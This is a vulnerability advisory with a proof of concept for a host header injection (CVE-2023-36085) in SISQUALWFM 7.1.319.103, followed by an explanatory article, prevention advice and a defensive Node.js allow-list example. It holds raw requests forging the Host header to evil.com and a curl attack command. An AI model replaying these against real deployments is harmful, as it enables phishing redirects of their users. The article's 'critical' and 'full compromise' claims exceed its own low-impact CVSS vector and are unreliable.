SISQUALWFM 7.1.319.103 - Host Header Injection
# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
# Discovered Date: 17/03/2023
# Reported Date: 17/03/2023
# Resolved Date: 13/10/2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://www.sisqualwfm.com
# Version: 7.1.319.103
# Tested on: SISQUAL WFM 7.1.319.103
# Affected Version: sisqualWFM - 7.1.319.103
# Fixed Version: sisqualWFM - 7.1.319.111
# CVE : CVE-2023-36085
# CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
# Category: Web Apps
A proof-of-concept (PoC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the Host header.
****************************************************************************************************
Original Request
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
****************************************************************************************************
Original Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
****************************************************************************************************
Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
****************************************************************************************************
Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 0
****************************************************************************************************
Method of Attack
****************************************************************************************************
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
****************************************************************************************************
Understanding Host Header Injection in SISQUALWFM 7.1.319.103: A Critical Web Security Vulnerability
Host header injection is a subtle yet potent web application vulnerability that can lead to severe security consequences, including unauthorized redirection, session hijacking, and even server-side request forgery (SSRF). In March 2023, a critical flaw was identified in SISQUALWFM 7.1.319.103, a widely used enterprise workflow management platform. This vulnerability, formally recognized as CVE-2023-36085, highlights how improper handling of the Host header can compromise application integrity and user trust.
What Is Host Header Injection?
HTTP requests include a Host header that specifies the domain name of the server being accessed. While servers typically trust this header, some applications fail to validate or sanitize it. When this happens, an attacker can supply a Host value that the server then embeds in the URLs it generates, pointing them at a domain of the attacker's choosing.
For example, if a server uses the Host header to generate URLs for redirects, authentication, or session management, an attacker can craft a malicious Host value to force the application to redirect users to a phishing site or a malicious backend server.
The SISQUALWFM 7.1.319.103 Vulnerability in Action
Consider the following scenario involving the /sisqualIdentityServer/core/login endpoint:
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: session=abc123
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
This original request is legitimate and directed to sisqualwfm.cloud. The server responds with a 302 Found redirect:
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
The Location header is generated based on the Host value, indicating that the server dynamically constructs redirect URLs using the incoming Host header.
Exploiting the Vulnerability: Redirecting to Evil.com
An attacker can intercept the request using a proxy like Burp Suite and modify the Host header to evil.com:
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: session=abc123
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Now, the server responds with:
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
Users are redirected to https://evil.com, a malicious domain controlled by the attacker. This is not just a simple redirect; it can be leveraged for:
- Phishing attacks: Fake login pages mimicking the original SISQUALWFM interface.
- Session hijacking: If the application uses the Host header to validate session tokens, the attacker can bypass authentication.
- SSRF (Server-Side Request Forgery): If internal services use the Host header to determine target endpoints, attackers can force internal requests to external malicious servers.
Security Impact and CVSS Analysis
The vulnerability carries the CVSS vector 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, with the following metrics:
| Vector | Value |
|---|---|
| AV | N (Network) |
| AC | L (Low) |
| PR | N (None) |
| UI | R (Required) |
| S | C (Changed) |
| C | L (Low) |
| I | L (Low) |
| A | N (None) |
This indicates a low-complexity attack that requires user interaction (e.g., visiting a malicious link), but with significant impact due to potential data leakage and session manipulation. The S:C (Changed) metric reflects that the impact reaches beyond the vulnerable component: the forged redirect acts on the user's browser, not only on the application itself.
How to Prevent Host Header Injection
Developers and security teams must implement strict validation and sanitization of the Host header. The following best practices should be enforced:
- Whitelist Host headers: Only accept requests for known, trusted domains (e.g., sisqualwfm.cloud).
- Validate against configured domains: Use server configuration to define allowed hosts, and reject any mismatch.
- Do not use the Host header for URL generation: Always construct URLs from internal configuration or hardcoded values, not from user-provided headers.
- Log suspicious Host values: Monitor for unexpected or malformed Host headers in logs for early detection.
For example, in a secure application, the redirect logic should be:
// Instead of (the Host header is client-controlled, so the target can be forged):
redirectUrl = "https://" + request.headers["host"] + "/login";
// Use the canonical host from server configuration:
redirectUrl = "https://sisqualwfm.cloud/login";
This ensures that the redirect target is hardcoded and cannot be influenced by malicious input.
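To show how the allow-list, configuration-based redirect and logging recommendations above fit together (and the Host-derived redirect described under "What Is Host Header Injection?"), here is an added Node.js example; it is not the vendor's code or the advisory's, and it assumes sisqualwfm.cloud as the only configured host, with the sample requests constructed to mirror the two shown in the advisory.

```javascript
// Added example (not vendor code): allow-list the Host header and build the
// redirect Location from configuration rather than from the request.
const ALLOWED_HOSTS = new Set(["sisqualwfm.cloud"]); // assumed configured host
const CANONICAL_ORIGIN = "https://sisqualwfm.cloud";   // from config, never from Host

// Normalise a raw Host value: lower-case it, strip an explicit port, reject junk.
function normalizeHost(raw) {
  if (typeof raw !== "string") return null;
  const m = /^([a-z0-9.-]+)(?::\d{1,5})?$/i.exec(raw.trim());
  return m ? m[1].toLowerCase() : null;
}

// True only when the Host header names a configured, trusted domain.
function isAllowedHost(raw) {
  const host = normalizeHost(raw);
  return host !== null && ALLOWED_HOSTS.has(host);
}

// Hardened redirect logic for a login endpoint: the Location is always derived
// from CANONICAL_ORIGIN; the request's Host is consulted only to decide whether
// to serve the redirect or to reject the request and record the value.
function buildRedirect(headers, path) {
  const host = headers["host"];
  if (!isAllowedHost(host)) {
    // Suspicious Host value: refuse to redirect and emit a log line for detection.
    return { status: 400, location: null, log: `rejected Host header: ${JSON.stringify(host)}` };
  }
  return { status: 302, location: CANONICAL_ORIGIN + path, log: null };
}

// Extract headers from a raw HTTP request text (keys lower-cased, as Node does).
function parseHeaders(rawRequest) {
  const headers = {};
  for (const line of rawRequest.split(/\r?\n/).slice(1)) {
    const idx = line.indexOf(":");
    if (idx > 0) headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return headers;
}

// Constructed samples mirroring the legitimate and tampered requests in the advisory.
const LEGIT_REQUEST = "GET /sisqualIdentityServer/core/login HTTP/2\nHost: sisqualwfm.cloud\nCookie: <cookie>";
const TAMPERED_REQUEST = "GET /sisqualIdentityServer/core/login HTTP/2\nHost: evil.com\nCookie: <cookie>";

console.log(buildRedirect(parseHeaders(LEGIT_REQUEST), "/sisqualIdentityServer/core/"));
console.log(buildRedirect(parseHeaders(TAMPERED_REQUEST), "/sisqualIdentityServer/core/"));
```

The tampered request yields a 400 and a log line instead of a Location pointing at evil.com, which is the behaviour the advisory's fixed version should exhibit.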
Resolution and Patch Update
The vulnerability was resolved in SISQUALWFM 7.1.319.111, released on October 13, 2023. The patch included:
- Host header validation logic
- Strict domain whitelisting
- Enhanced logging for malformed headers
Organizations using the affected version (7.1.319.103) are strongly advised to upgrade immediately to prevent exploitation.
Real-World Implications and Lessons Learned
Host header injection is often overlooked because it appears benign. However, as demonstrated in this case, it can be a gateway to full compromise of web applications. This vulnerability underscores the importance of:
- Defense in depth: Never trust client-provided headers without validation.
- Secure coding practices: Treat all input as potentially malicious, even if it seems harmless.
- Regular security audits: Automated tools and manual testing should include header validation checks.
Even a single misconfigured header can lead to a chain of attacks, especially in enterprise systems where user trust and data integrity are paramount.
Security professionals must remain vigilant. As new versions of SISQUALWFM are released, they should verify that host header handling remains secure—because the next vulnerability might be just one header away.